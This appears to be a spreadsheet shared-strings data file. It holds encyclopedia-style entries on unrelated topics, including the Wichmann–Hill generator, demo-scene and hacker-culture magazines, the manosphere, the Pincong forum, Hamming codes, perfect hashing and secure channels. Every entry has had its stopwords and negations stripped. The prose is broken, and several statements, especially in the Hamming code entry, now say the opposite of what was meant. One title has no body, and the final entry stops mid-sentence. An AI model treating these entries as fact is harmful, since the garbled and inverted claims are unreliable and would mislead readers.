  <si>
    <t>Wichmann–Hill</t>
  </si>
  <si>
    <t>wichmann–hill pseudorandom number generator proposed 1982 brian wichmann david hill. consists three linear congruential generators different prime moduli, used produce uniformly distributed number these summed, modulo produce result.summing three generators produces pseudorandom sequence cycle exceeding 6.95×1012. specifically, moduli 30269, 30307 30323, producing periods 30268, 30306 30322. overall period least common multiple these: 30268×30306×30322/4 6953607871644. this confirmed brute-force search. implementation following pseudocode implementation machines capable integer arithmetic 5,212,632: function(s1, random 30,000. clock available. mod(171 30269) mod(172 30307) mod(170 30323) mod(s1/30269.0 s2/30307.0 s3/30323.0, machines limited 16-bit signed integers, following equivalent code uses numbers 30,323: function(s1, random 30,000. clock available. mod(s1, 177) floor(s1 177) mod(s2, 176) floor(s2 176) mod(s3, 178) floor(s3 178) mod(s1/30269 s2/30307 s3/30323, seed values must initialized non-zero values. references</t>
  </si>
  <si>
    <t>Grapevine (disk magazine)</t>
  </si>
  <si>
    <t>grapevine disk magazine commodore amiga published demo scene group lsd. magazine published 1991 1995. first eight issues came single floppy disk, magazine became popular articles submitted readers, required three disks issue point. editor grapevine known parasite, later pazza/lsd. several co-editors helped magazine pazzas guidance, scud/lsd, torch/lsd kend/lsd. magazine originally coded monty python, re-coded mouse driven interface later series shagratt, fish/lsd, watchman/lsd artists regularly made custom covers magazines title page. echo/lsd (graham gray/spoon wizard) mub/lsd wrote original music background also grapevine existed time internet widespread native abroad, hence editions magazine hotly traded amongst demo scene. sent hundreds floppy disk copies release, libraries time keen include latest issues soon released. result this, 17bit library deal pazza ensure distribution fair price, "paid" floppy disks issue this, used file distribution (the days modems many people). pazza long left scene lives happily married quiet life still keeps occasionally school scene, immensely proud done time hard work little reward. breadth topics grapevine accepted articles thing resulted quality magazine truly unique. mainly scene within scene articles would made little sense perceived outsiders nonetheless widely well received. pazzas musings usually tongue cheek look everything anything usually ended quote spelling mistakes copyright secret articles several issues magazine contained "secret" articles. access them, press type corresponding password, followed enter: "recoded" "party" "bust" "quartz" "bastard" "late" "secretmenu" "wombatateam" "party" "xmas" none looking data files editor, rombust, theres sectret article!" [sic] appears code, password revival attempt made 2005 revive grapevine, form web-based magazine. however, done unofficially group connected original, known ellesdee. usage original disk magazine's name, well ellesdee corruption original creator's name (lsd), brought strong criticism members demo scene, including original team. some original members approached permission start revival project first issues contained submissions kend/lsd. revival site, well ellesdee, subsequently shut down. exact reasons dispute. references external links grapevine controversy</t>
  </si>
  <si>
    <t>Forward error correction</t>
  </si>
  <si>
    <t>Gray Areas</t>
  </si>
  <si>
    <t>gray areas quarterly magazine published 1992 1995 publisher netta gilboa. magazine based phoenix, arizona. several awards including "one magazines 1992" library journal. discussed subcultures involving drugs (narcotics), phreaking, cyberpunk, pornography, grateful dead related issues. published issues, continues website. issue contents issue fall 1992 volume pages) interview: john perry barlow computer crimes interview: parker adult film industry tape history: grateful dead live video tapes interview: tricksters rock bandissue spring 1993 volume (116 pages) interview: attorney/musician barry melton interview: adult film director candida royalle tape history: little feat live audio tapes tape history: grateful dead bootleg things know about urine tests it's later than thought: your amendment rights computer privacy common essay fan-artist relationship pilgrimage morrison's grave interview: paul quinn soup dragonsissue summer 1993 volume (132 pages) interview: musician allin interview: grateful dead hour host david gans richard pacheco adult films tape history: jefferson airplane live video tapes phone phun phenomena: notes prank call underground interview: prank call expert john trubee interview: urnst kouch, computer virus writer howard stern here stay worlds war, gray gods: theory encountersissue fall 1993 volume (148 pages) interview: ivan stang church subgenius interview: riaa piracy director steven d'onofrio interview: phone fantasy girl review: defcon hackers convention gray travel: amsterdam confessions amerikan eater worlds war, ultimate sin: conspiracies with your life: music industry wants record concerts plagiarism: thoughts sampling, originality ownership interview: solar circus rock bandissue spring 1994 volume (148 pages) interview: breaking into well interview: dominatrix paul melka computer viruses review: pumpcon hohocon hacker conventions inside today's hacking mind interview: phone phreak improving prison environment teenager joins fight against aids concealing identity: silence imposed society about smart drugs lollapalooza 1993 review entertainment industry lawyers deadheads constitution tape history: jefferson airplane bootlegs tape history: guide vintage live soul tapes music seminar july 1993issue fall 1994 volume (148 pages) interview: hacker/phrack publisher erik bloodaxe interview: adult film star taylor wane review: computers, freedom privacy conference stormbringer phalcon/skism computer virus writers cyberpunk manifesto interview: cable thief true cop, blue cop, gray jury tampering crime? interview: folk singer melanie jimi hendrix: bootleg tape history: brother holding company genitorturers mean some harmissue spring 1995 volume (148 pages) interview: mike gordon phish interview: internet liberation front review: defcon hohocon hope hacker conventions tape history: jethro tull live video tapes scanners: tuning illegally phone calls confessions aids activist adventures porn store conflicts over oldest profession thousand years: housewife hooker's story psychoanalysis feminism prozac: controversial future psychopharmacology gray area drug addiction deception: polygraph detection voices adoptees: silent society gray john wayne gacy lollapalooza 1994 review references external links official website</t>
  </si>
  <si>
    <t>Manosphere</t>
  </si>
  <si>
    <t>manosphere collection websites, blogs, online forums promoting varying degrees) masculinity, misogyny, opposition feminism. communities within manosphere include men's rights activists, incels (involuntary celibates), going their (mgtow), pick-up artists (pua), fathers' rights groups.the manosphere overlaps far-right alt-right communities. also associated online harassment implicated radicalizing misogynist beliefs glorification violence women. some sources associated manosphere-based radicalization mass shootings motivated misogyny. history manosphere grew social movements men's liberation movement 1970s 80s. groups considered part manosphere, men's rights movement, predate term "manosphere". term, play word "blogosphere", believed first appeared blogspot 2009. subsequently popularized ironwood, pornography marketer collected variety blogs forums book form manosphere: hope masculinity. term entered popular lexicon news media began stories committed acts misogynist violence, sexual assault, online harassment.emma jane identifies late 2000s–early 2010s "tipping point" manosphere communities moved fringes internet towards mainstream. hypothesizes related advent rise social media, combination ongoing systemic misogyny within patriarchal culture. jane writes manosphere well established time gamergate controversy 2014, misogynistic language graphic rape threats women entered mainstream discourse, deployed necessarily identified specific manosphere group. ideology content manosphere heterogeneous group online communities includes men's-rights activists (mras), incels (involuntary celibates), going their (mgtow), pick-up artists (puas), fathers' rights groups. some groups adversarial relationships another.while specifics group's ideology sometimes conflict, general ideology manosphere groups centers promotion masculinity, strong opposition feminism, misogyny. media scholar debbie ging writes several manosphere subgroups, mras puas, "exaggerate differences displays infight posturing, spite fact philosophies almost identical". according criminologist lisa sugiura, disparate groups within manosphere "united central belief feminine values, propelled feminism, dominate society promote 'misandrist' ideology needs overthrown". journalist caitlin dewey argues main tenets manosphere reduced corruption modern society feminism, violation inherent differences women; ability save society achieve sexual prowess adopting hyper-masculine role forcing women submit them. particular, feminists portrayed ignoring male victims sexual assault encouraging false rape accusations men. jargon manosphere distinct jargon. idea misandry (hatred prejudice men) commonly invoked, equivalent misogyny deny existence institutionalized sexism. central tenet concept pill, metaphor borrowed film matrix. concerns awakening supposed reality society dominated feminism biased men. manospherians believe feminists political correctness obscure reality, victims must fight protect themselves. accepting manosphere's ideology equated "taking pill", seen "blue pilled" "taken blue pill". such terminology originated antifeminist subreddit /r/theredpill later taken men's rights mgtow sites. donna zuckerberg writes, "the pill represents phase online misogyny. members mock belittle women; also believe society, oppressed women."men commonly divided "alpha" "beta" males within evolutionary-psychology framework, "alphas" seen sexually dominant attractive women, hardwired want alphas pair "beta" males financial benefits. among mras puas argument known "alpha beta bux". associated movements manosphere overlaps white-supremacist far-right ideologies, including neoreactionary, white-nationalist alt-right movement. zuckerberg writes many alt-right members either pick-up artists mgtow, "the policing white female sexuality major concern" alt-right. severity antifeminism espoused within communities varies, espousing fairly mild sexism others glorifying extreme misogyny. racism xenophobia also common among groups manosphere, perceived threats western civilization popular topic. radicalization violence manosphere associated online harassment, radicalizing misogynist beliefs glorification violence women. some sources associated manosphere-based radicalization mass shootings motivated misogyny. robin mamié école polytechnique fédérale lausanne colleagues associate radicalization far-right ideologies manosphere idea alt-right pipeline. websites manosphere comprises various websites, blogs, online forums. noted sites include /r/theredpill, return kings, voice men, well (the now-defunct) puahate sluthate.reddit popular gathering place manosphere supporters, several forums site geared toward ideas. however, late 2010s 2020s reddit began take steps discourage extreme manosphere subreddits. some banned, /r/incels (banned 2017), successor /r/braincels (banned 2018), /r/mgtow (banned august 2021); subreddits /r/theredpill "quarantined", meaning warning displayed users content subreddit users must sign they're allowed enter. result, communities found homes websites welcoming extreme content, gab. public perception manosphere received significant coverage media association high-profile violent attacks including 2014 isla vista killings california, 2015 umpqua community college shooting oregon, 2018 toronto attack, well phenomena sustained online abuse towards female members video game community came known gamergate. following isla vista shooting, killer elliot rodger found active participant puahate manosphere forum. following attack, dewey wrote that, manosphere blame rodger's attack, "rodger's misogynistic rhetoric seems undeniably influenced manosphere". sociologist michael kimmel argued would facile argue manosphere urged [rodger] this. think places kind solace they provide kind locker room, place guys gripe things done women".arthur goldwag described manosphere spring 2012 edition southern poverty center's intelligence report "underworld misogynists, woman-haters whose fury goes well beyond criticism family court system, domestic violence laws, false rape accusations... [who are] devoted attacking virtually women (or, least, westernized ones)." added caveat later year, saying, mentioned splc label mras members hate movement; article claim grievances websites false rape accusations, ruinous divorce settlements like without merit. call specific examples misogyny threat, overt implicit, violence." 2018, splc added male supremacy category track list hate groups. british anti-extremism group hope hate included manosphere 2019 state hate report. also notes references further reading h.c. (july 2016). "what manosphere?". economist.</t>
  </si>
  <si>
    <t>Pincong</t>
  </si>
  <si>
    <t>pincong (chinese: chinese internet forum focusing political topics, literally meaning "tasting onion". users forum called "pincongers". server located united states, currently blocked great firewall mainland china. website enables users make discussions political issues, usually banned zhihu, popular chinese forum. older site pincong shut october 2018, current site (new pincong, chinese: 新·品蔥) re-opens november 2018. features website's interface written simplified chinese, majority users china, also users hong kong, taiwan countries/regions. since pincong blocked mainland china, people mainland need access website, users also share technical experiences regarding internet censorship circumvention(such china great firewall,china's spyware) protect users' safety, server neither record address need email address phone number registration. also function like delayed posting.the default search engine throughout website duckduckgo. many users believe safer access pincong android. many suggest better browser enable 'private window tor.'(you brave computer) most discussions pincong related politics. other features pincong include open source website architecture, transparent background data, disabled private messaging preset. administrator system pincong users promoted administrators votes experienced users, rather appointed site owner. that done so-called "reputation system", likes dislikes users high reputations towards posts affect poster. users enough reputation granted foreground admin permissions banning users violated site rules, collapsing unfolding posts. users certain amount reputation also make proposals site rules, however administrators vote bills. contents influences august 2019, hong kong protests china extradition, hong kong protester posted article pincong titled letter mainland fellows hong kong protesters。 november 2019, many users mainland china uploaded student card, diploma photo ids, partially covered piece paper anonymously support hong kong protests. some wrote "freedom perish, demise."。 november 2019, pincong user published webpage github named geng shuang emulator, emulate clichéd speech chinese diplomat geng shuang. randomly rearranges geng shuang's speeches, keywords replaced generate speech. that attracted attention political activists hong kong taiwan. emulator removed december january 2020, another pincong user published chunying emulator. april 2020, nature journal article china tightening grip coronavirus research, cited article pincong, view china required academic papers covid-19 filed (chinese:《如何看待國內規定與新冠肺炎有關的學術論文需審核備案》). reviews washington post described pincong popular forum among chinese geeks, mentioned style similar reddit. article quartz financial says majority pincong users liberals china. global times, media owned controlled chinese government, rated pincong anti-china forum. also lihkg golden bulletin board system internet censorship circumvention references external links pincong forum mohu forum chinese political parody website, previously used parent domain pincong. site management independent however.） github: pincong-wecenter（the forum platform adapted pincong） github: pincong database inquiry</t>
  </si>
  <si>
    <t>Hamming code</t>
  </si>
  <si>
    <t>computer science telecommunication, hamming codes family linear error-correcting codes. hamming codes detect one-bit two-bit errors, correct one-bit errors without detection uncorrected errors. contrast, simple parity code cannot correct errors, detect number bits error. hamming codes perfect codes, achieve highest possible rate codes block length minimum distance three.richard hamming invented hamming codes 1950 automatically correcting errors introduced punched card readers. original paper, hamming elaborated general idea, specifically focused hamming(7,4) code adds three parity bits four bits data.in mathematical terms, hamming codes class binary linear code. integer code-word block length message length hence rate hamming codes highest possible codes minimum distance three (i.e., minimal number changes needed code word code word three) block length parity-check matrix hamming code constructed listing columns length non-zero, means dual code hamming code shortened hadamard code. parity-check matrix property columns pairwise linearly independent. limited redundancy hamming codes data, detect correct errors error rate low. this case computer memory (usually ram), errors extremely rare hamming codes widely used, correction system (ecc memory). context, extended hamming code extra parity often used. extended hamming codes achieve hamming distance four, allows decoder distinguish one-bit error occurs two-bit errors occur. sense, extended hamming codes single-error correcting double-error detecting, abbreviated secded. history richard hamming, inventor hamming codes, worked bell labs late 1940s bell model computer, electromechanical relay-based machine cycle times seconds. input punched paper tape, seven-eighths inch wide, holes row. during weekdays, errors relays detected, machine would stop flash lights operators could correct problem. during after-hours periods weekends, operators, machine simply moved next job. hamming worked weekends, grew increasingly frustrated restart programs scratch detected errors. taped interview, hamming said, "and said, 'damn machine detect error, can't locate position error correct it?'". over next years, worked problem error-correction, developing increasingly powerful array algorithms. 1950, published known hamming code, remains today applications memory. codes predating hamming number simple error-detecting codes used hamming codes, none effective hamming codes overhead space. parity parity adds single indicates whether number ones (bit-positions values one) preceding data even odd. number bits changed transmission, message change parity error detected point; however, changed parity itself. common convention parity value indicates number ones data, parity value zero indicates even number ones. number bits changed even, check valid error detected. moreover, parity indicate contained error, even detect data must discarded entirely re-transmitted scratch. noisy transmission medium, successful transmission could take long time never occur. however, quality parity checking poor, since uses single bit, method results least overhead. two-out-of-five code two-out-of-five code encoding scheme uses five bits consisting exactly three this provides possible combinations, enough represent digits 0–9. this scheme detect single bit-errors, numbered bit-errors even numbered bit-errors (for example flipping 1-bits). however still cannot correct errors. repetition another code time repeated every data multiple times order ensure sent correctly. instance, data sent repetition code send 111. three bits received identical, error occurred transmission. channel clean enough, time change triple. therefore, 001, 010, correspond bit, 110, 101, correspond bit, greater quantity digits ('0' '1') indicating data code ability reconstruct original message presence errors known error-correcting code. this triple repetition code hamming code since parity bits, data bit. such codes cannot correctly repair errors, however. example, channel flips bits receiver gets 001, system detect error, conclude original incorrect. increase size string four, detect two-bit errors cannot correct (the quantity parity bits even); five bits, detect correct two-bit errors, three-bit errors. moreover, increasing size parity string inefficient, reducing throughput three times original case, efficiency drops drastically increase number times duplicated order detect correct errors. description error-correcting bits included message, bits arranged different incorrect bits produce different error results, bits could identified. seven-bit message, seven possible single errors, three error control bits could potentially specify error occurred also caused error. hamming studied existing coding schemes, including two-of-five, generalized concepts. start with, developed nomenclature describe system, including number data bits error-correction bits block. instance, parity includes single data word, assuming ascii words seven bits, hamming described (8,7) code, eight bits total, seven data. repetition example would (3,1), following logic. code rate second number divided first, repetition example, 1/3. hamming also noticed problems flipping bits, described "distance" called hamming distance, him). parity distance flip detected corrected, flips invisible. (3,1) repetition distance three bits need flipped triple obtain another code word visible errors. correct one-bit errors detect correct two-bit errors. (4,1) repetition (each repeated four times) distance flipping three bits detected, corrected. when three bits flip group situations attempting correct produce wrong code word. general, code distance detect correct errors. hamming interested problems once: increasing distance much possible, time increasing code rate much possible. during 1940s developed several encoding schemes dramatic improvements existing codes. systems parity bits overlap, managed check well data. general algorithm following general algorithm generates single-error correcting (sec) code number bits. main idea choose error-correcting bits index-xor (the positions containing positions 100, etc. binary) error-correcting bits, guarantees possible error-correcting bits index-xor whole message receiver receives string index-xor conclude corruptions, otherwise, index-xor indicates index corrupted bit. algorithm deduced following description: number bits starting etc. write numbers binary: 100, 101, 110, 111, etc. positions powers (have single binary form position) parity bits: etc. 100, 1000) positions, bits binary form position, data bits. each data included unique parity bits, determined binary form position. parity covers positions least significant set: (the parity itself), etc. parity covers positions second least significant set: bits 2-3, 6-7, 10-11, etc. parity covers positions third least significant set: bits 4–7, 12–15, 20–23, etc. parity covers positions fourth least significant set: bits 8–15, 24–31, 40–47, etc. general parity covers bits bitwise parity position position non-zero.if byte data encoded 10011010, data word (using represent parity bits) would __1_001_1010, code word 011100101010. choice parity, even odd, irrelevant choice must used encoding decoding. this general rule shown visually: shown encoded bits parity, data) pattern continues indefinitely. thing hamming codes seen visual inspection given included unique parity bits. check errors, check parity bits. pattern errors, called error syndrome, identifies error. parity bits correct, error. otherwise, positions erroneous parity bits identifies erroneous bit. example, parity bits positions indicate error, 1+2+8=11 error. parity indicates error, parity error. with parity bits, bits {\displaystyle 2^{m}-1} covered. after discounting parity bits, {\displaystyle 2^{m}-m-1} bits remain data. varies, possible hamming codes: hamming codes additional parity (secded) hamming codes minimum distance means decoder detect correct single error, cannot distinguish double error codeword single error different codeword. thus, double-bit errors incorrectly decoded single errors therefore undetected, unless correction attempted. remedy shortcoming, hamming codes extended extra parity bit. this way, possible increase minimum distance hamming code allows decoder distinguish single errors two-bit errors. thus decoder detect correct single error time detect (but correct) double error. decoder attempt correct errors, reliably detect triple errors. decoder correct errors, triple errors mistaken single errors "corrected" wrong value. error correction therefore trade-off certainty (the ability reliably detect triple errors) resiliency (the ability keep functioning face single errors). this extended hamming code popular computer memory systems, known secded (abbreviated single error correction, double error detection). particularly popular (72,64) code, truncated (127,120) hamming code plus additional parity bit, space overhead (9,8) parity code. [7,4] hamming code 1950, hamming introduced [7,4] hamming code. encodes four data bits seven bits adding three parity bits. detect correct single-bit errors. with addition overall parity bit, also detect (but correct) double-bit errors. construction matrix {\displaystyle \mathbf :={\begin{pmatrix}{\begin{array}{c|c}i_{k}&amp;-a^{\text{t}}\\\end{array}}\end{pmatrix}}} called (canonical) generator matrix linear (n,k) code, {\displaystyle \mathbf :={\begin{pmatrix}{\begin{array}{c|c}a&amp;i_{n-k}\\\end{array}}\end{pmatrix}}} called parity-check matrix. this construction standard systematic) form. regardless form, linear block codes must satisfy {\displaystyle \mathbf \,\mathbf ^{\text{t}}=\mathbf all-zeros matrix.since parity-check matrix hamming code constructed listing columns length pair-wise independent. thus matrix whose left side nonzero n-tuples order n-tuples columns matrix matter. right hand side k)-identity matrix. obtained taking transpose left hand side identity k-identity matrix left hand side code generator matrix {\displaystyle \mathbf parity-check matrix {\displaystyle \mathbf are: {\displaystyle \mathbf :={\begin{pmatrix}1&amp;0&amp;0&amp;0&amp;1&amp;1&amp;0\\0&amp;1&amp;0&amp;0&amp;1&amp;0&amp;1\\0&amp;0&amp;1&amp;0&amp;0&amp;1&amp;1\\0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1\end{pmatrix}}_{4,7}} {\displaystyle \mathbf :={\begin{pmatrix}1&amp;1&amp;0&amp;1&amp;1&amp;0&amp;0\\1&amp;0&amp;1&amp;1&amp;0&amp;1&amp;0\\0&amp;1&amp;1&amp;1&amp;0&amp;0&amp;1\end{pmatrix}}_{3,7}.} finally, matrices mutated equivalent non-systematic codes following operations: column permutations (swapping columns) elementary operations (replacing linear combination rows) encoding examplefrom matrix codewords. {\displaystyle {\vec {a}}} vector binary data bits, {\displaystyle {\vec {a}}=[a_{1},a_{2},a_{3},a_{4}],\quad a_{i}\in \{0,1\}} codeword {\displaystyle {\vec {x}}} possible data vectors {\displaystyle {\vec {a}}} given standard matrix product {\displaystyle {\vec {x}}={\vec {a}}g} summing operation done modulo-2. example, {\displaystyle {\vec {a}}=[1,0,1,1]} using generator matrix {\displaystyle above, (after applying modulo sum), {\displaystyle {\vec {x}}={\vec {a}}g={\begin{pmatrix}1&amp;0&amp;1&amp;1\end{pmatrix}}{\begin{pmatrix}1&amp;0&amp;0&amp;0&amp;1&amp;1&amp;0\\0&amp;1&amp;0&amp;0&amp;1&amp;0&amp;1\\0&amp;0&amp;1&amp;0&amp;0&amp;1&amp;1\\0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1\\\end{pmatrix}}={\begin{pmatrix}1&amp;0&amp;1&amp;1&amp;2&amp;3&amp;2\end{pmatrix}}={\begin{pmatrix}1&amp;0&amp;1&amp;1&amp;0&amp;1&amp;0\end{pmatrix}}} [7,4] hamming code additional parity [7,4] hamming code easily extended [8,4] code adding extra parity (7,4) encoded word (see hamming(7,4)). this summed revised matrices: {\displaystyle \mathbf :={\begin{pmatrix}1&amp;1&amp;1&amp;0&amp;0&amp;0&amp;0&amp;1\\1&amp;0&amp;0&amp;1&amp;1&amp;0&amp;0&amp;1\\0&amp;1&amp;0&amp;1&amp;0&amp;1&amp;0&amp;1\\1&amp;1&amp;0&amp;1&amp;0&amp;0&amp;1&amp;0\end{pmatrix}}_{4,8}} {\displaystyle \mathbf :={\begin{pmatrix}1&amp;0&amp;1&amp;0&amp;1&amp;0&amp;1&amp;0\\0&amp;1&amp;1&amp;0&amp;0&amp;1&amp;1&amp;0\\0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1&amp;0\\1&amp;1&amp;1&amp;1&amp;1&amp;1&amp;1&amp;1\end{pmatrix}}_{4,8}.} note standard form. obtain elementary operations used obtain equivalent matrix systematic form: {\displaystyle \mathbf =\left({\begin{array}{cccc|cccc}0&amp;1&amp;1&amp;1&amp;1&amp;0&amp;0&amp;0\\1&amp;0&amp;1&amp;1&amp;0&amp;1&amp;0&amp;0\\1&amp;1&amp;0&amp;1&amp;0&amp;0&amp;1&amp;0\\1&amp;1&amp;1&amp;0&amp;0&amp;0&amp;0&amp;1\end{array}}\right)_{4,8}.} example, first matrix second third rows non-systematic form. using systematic construction hamming codes above, matrix apparent systematic form written {\displaystyle \mathbf =\left({\begin{array}{cccc|cccc}1&amp;0&amp;0&amp;0&amp;0&amp;1&amp;1&amp;1\\0&amp;1&amp;0&amp;0&amp;1&amp;0&amp;1&amp;1\\0&amp;0&amp;1&amp;0&amp;1&amp;1&amp;0&amp;1\\0&amp;0&amp;0&amp;1&amp;1&amp;1&amp;1&amp;0\end{array}}\right)_{4,8}.} non-systematic form reduced (using elementary operations) match matrix. addition fourth effectively computes codeword bits (data parity) fourth parity bit. example, 1011 encoded (using non-systematic form start section) 01100110 blue digits data; digits parity bits [7,4] hamming code; green digit parity added [8,4] code. green digit makes parity [7,4] codewords even. finally, shown minimum distance increased [7,4] code, [8,4] code. therefore, code defined [8,4] hamming code. decode [8,4] hamming code, first check parity bit. parity indicates error, single error correction (the [7,4] hamming code) indicate error location, error" indicating parity bit. parity correct, single error correction indicate (bitwise) exclusive-or error locations. locations equal ("no error") double error either occurred, cancelled out. otherwise, double error occurred. also notes references external links visual explanation hamming codes script calculating hamming distances (from tervo, unb, canada) tool calculating hamming code</t>
  </si>
  <si>
    <t>HAS-V</t>
  </si>
  <si>
    <t>has-v cryptographic hash function variable output length. has-v hash function based block cipher. hash function produce hash values lengths bytes. specifications digest size: 128-320 bits message length: &lt;264 bits compression function: 1024-bit message block, 320-bit chaining variable hash function developed kyoung park, joon hwang joong lee, released 2000. also one-way compression function describes hash functions built block ciphers. external links has-v: hash function variable output length references</t>
  </si>
  <si>
    <t>Perfect hash function</t>
  </si>
  <si>
    <t>computer science, perfect hash function hash function maps distinct elements integers, collisions. mathematical terms, injective function. perfect hash functions used implement lookup table constant worst-case access time. perfect hash function can, hash function, used implement hash tables, advantage collision resolution implemented. addition, keys data known queried keys valid, keys need stored lookup table, saving space. disadvantages perfect hash functions needs known construction perfect hash function. non-dynamic perfect hash functions need re-constructed changes. frequently changing dynamic perfect hash functions used cost additional space. space requirement store perfect hash function o(n). important performance parameters perfect hash functions evaluation time, constant, construction time, representation size. application perfect hash function values limited range used efficient lookup operations, placing keys associated values) lookup table indexed output function. test whether present look value associated key, looking cell table. each lookup takes constant time worst case. with perfect hashing, associated data read written single access table. performance perfect hash functions important performance parameters perfect hashing representation size, evaluation time, construction time, additionally range requirement {\displaystyle {\frac {m}{n}}} evaluation time fast o(1), optimal. construction time needs least o(n), element needs considered, contains elements. this lower bound achieved practice.the lower bound representation size depends (1+ε) perfect hash function. good approximation lower bound {\displaystyle \log e-\varepsilon \log {\frac {1+\varepsilon }{\varepsilon bits element. minimal perfect hashing, lower bound 1.44 bits element. construction perfect hash function specific evaluated constant time, values small range, found randomized algorithm number operations proportional size original construction fredman, komlós szemerédi (1984) uses two-level scheme elements range o(n) indices, index range hash values. first level construction chooses large prime (larger size universe drawn), parameter maps element index {\displaystyle g(x)=(kx{\bmod {p}}){\bmod {n}}.} chosen randomly, step likely collisions, number elements simultaneously mapped index likely small. second level construction assigns disjoint ranges o(ni2) integers index uses second linear modular functions, index member range associated g(x).as fredman, komlós szemerédi (1984) show, exists choice parameter lengths ranges different values g(x) o(n). additionally, value g(x), exists linear modular function maps corresponding subset range associated value. both second-level functions value g(x), found polynomial time choosing values randomly finding works.the hash function requires storage space o(n) store second-level linear modular functions. computing hash value given performed constant time computing g(x), looking second-level function associated g(x), applying function modified version two-level scheme larger number values level used construct perfect hash function maps smaller range length o(n).a recent method constructing perfect hash function described belazzougui, botelho dietzfelbinger (2009) "hash, displace, compress". here first-level hash function also used elements onto range integers. element stored bucket bg(x).then, descending order size, bucket's elements hashed hash function sequence independent fully random hash functions (φ1, ...), starting hash function produce collisions bucket, resulting values occupied elements buckets, function chosen bucket. not, next hash function sequence tested.to evaluate perfect hash function h(x) save mapping bucket index g(x) onto correct hash function sequence, resulting h(x) φσ(g(x)).finally, reduce representation size, (σ(i))0 compressed form still allows evaluation o(1).this approach needs linear time construction, constant evaluation time. representation size o(n), depends achieved range. example, 1.23n belazzougui, botelho dietzfelbinger (2009) achieved representation size 3.03 bits/key 1.40 bits/key given example million entries, lower values needing higher computation time. space lower bound scenario 0.88 bits/key. pseudocode algorithm hash, displace, compress split buckets g−1({i})∩s,0 sort buckets falling order according size |bi| initialize array t[0...m-1] ∈[r], order (2), 1,2,... repeat forming {φl(x)|x |ki|=|bi| ki∩{j|t[j]=1}= σ(i):= successful t[j]:= transform (σi)0≤i&lt;r compressed form, retaining o(1) access. space lower bounds o(n) words information store function fredman, komlós szemerédi (1984) near-optimal: perfect hash function calculated constant time requires least number bits proportional size s.for minimal perfect hash functions information theoretic space lower bound 1.44 {\displaystyle \log _{2}e\approx 1.44} bits/key.for perfect hash functions, first assumed range bounded (1+ε) with formula given belazzougui, botelho dietzfelbinger (2009) universe {\displaystyle u\supseteq whose size tends towards infinity, space lower bounds {\displaystyle \log _{2}e-\varepsilon \log {\frac {1+\varepsilon }{\varepsilon bits/key, minus log(n) bits overall. extensions memory address identity trivial pervasive example perfect hashing implicit (virtual) memory address space computer. since byte virtual memory distinct, unique, directly addressable storage location, value (starting) address object stored memory considered de-facto perfect hash object entire memory address range. dynamic perfect hashing using perfect hash function best situations frequently queried large set, seldom updated. this modification cause hash function longer perfect modified set. solutions update hash function time modified known dynamic perfect hashing, methods relatively complicated implement. minimal perfect hash function minimal perfect hash function perfect hash function maps keys consecutive integers usually numbers formal expressing elements finite then minimal perfect hash function h(j) h(k) implies (injectivity) exists integer range a..a proven general purpose minimal perfect hash scheme requires least 1.44 bits/key. although space bound achieved theoretical works, practice, best known minimal perfect hashing schemes require roughly 1.56 bits/key given enough time. k-perfect hashing hash function k-perfect elements mapped onto value range. "hash, displace, compress" algorithm used construct k-perfect hash functions allowing collisions. changes necessary accomplish minimal, underlined adapted pseudocode below: ∈[r], order (2), 1,2,... repeat forming {φl(x)|x |ki|=|bi| ki∩{j|t[j]=k}= σ(i):= successful t[j]←t[j]+1 order preservation minimal perfect hash function order preserving keys given order ..., keys implies f(aj) f(ak). case, function value position sorted ordering keys. simple implementation order-preserving minimal perfect hash functions constant access time (ordinary) perfect hash function cuckoo hashing store lookup table positions key. keys hashed stored sorted array, possible store small number additional bits data structure used compute hash values quickly. order-preserving minimal perfect hash functions require necessarily bits represented. related constructions simple alternative perfect hashing, also allows dynamic updates, cuckoo hashing. this scheme maps keys locations within range (unlike perfect hashing maps single location) keys assigned one-to-one locations mapped. lookups scheme slower, multiple locations must checked, nevertheless take constant worst-case time. references further reading richard cichelli. minimal perfect hash functions made simple, communications acm, vol. number january 1980. thomas cormen, charles leiserson, ronald rivest, clifford stein. introduction algorithms, third edition. press, 2009. isbn 978-0262033848. section 11.5: perfect hashing, 267, 277–282. fabiano botelho, rasmus pagh nivio ziviani. "perfect hashing data management applications". fabiano botelho nivio ziviani. "external perfect hashing large sets". 16th conference information knowledge management (cikm07), lisbon, portugal, november 2007. djamal belazzougui, paolo boldi, rasmus pagh, sebastiano vigna. "monotone minimal perfect hashing: searching sorted table o(1) accesses". proceedings 20th annual acm-siam symposium discrete mathematics (soda), york, 2009. press. douglas schmidt, gperf: perfect hash function generator, report, sigs, vol. november/december, 1998. external links gperf open source perfect hash generator (very fast, works small sets) minimal perfect hashing (bob algorithm) jenkins cmph: minimal perfect hashing library, open source implementations many (minimal) perfect hashes (works sets) sux4j: open source monotone minimal perfect hashing java mphsharp: perfect hashing methods bbhash: minimal perfect hash function header-only perfect::hash, perfect hash generator perl makes code. "prior art" section worth looking</t>
  </si>
  <si>
    <t>Secure channel</t>
  </si>
  <si>
    <t>cryptography, secure channel means data transmission resistant overhearing tampering. confidential channel means data transmission resistant overhearing (i.e., reading content), necessarily resistant tampering (i.e., manipulating content). authentic channel means data transmission resistant tampering necessarily resistant overhearing. contrast secure channel, insecure channel unencrypted subject eavesdropping. secure communications possible insecure channel content communicated encrypted prior transmission. secure channels real world there perfectly secure channels real world. there are, best, ways make insecure channels (e.g., couriers, homing pigeons, diplomatic bags, etc.) less insecure: padlocks (between courier wrists briefcase), loyalty tests, security investigations, guns courier personnel, diplomatic immunity diplomatic bags, forth. 1976, researchers proposed exchange technique (now named them)—diffie–hellman exchange (d-h). this protocol allows parties generate known them, assumption certain mathematical problem (e.g., diffie–hellman problem proposal) computationally infeasible (i.e., hard) solve, parties access authentic channel. short, eavesdropper—conventionally termed 'eve', listen messages exchanged parties, modify messages—will learn exchanged key. such exchange impossible previously known cryptographic schemes based symmetric ciphers, schemes necessary parties exchange secret prior time, hence require confidential channel time attempting build. important note cryptographic techniques trivially breakable keys exchanged securely actually exchanged, keys become known way— burglary extortion, instance. actually secure channel required insecure channel used securely exchange keys, burglary, bribery, threat used. eternal problem course remains—even modern exchange protocols—how know insecure channel worked securely alternatively, perhaps importantly, not), whether anyone actually bribed threatened simply lost notebook notebook computer) information these hard problems real world solutions known—only expedients, jury rigs, workarounds. future possibilities researchers proposed demonstrated quantum cryptography order create secure channel. clear whether special conditions made work practical real world noise, dirt, imperfection everything required function. thus far, 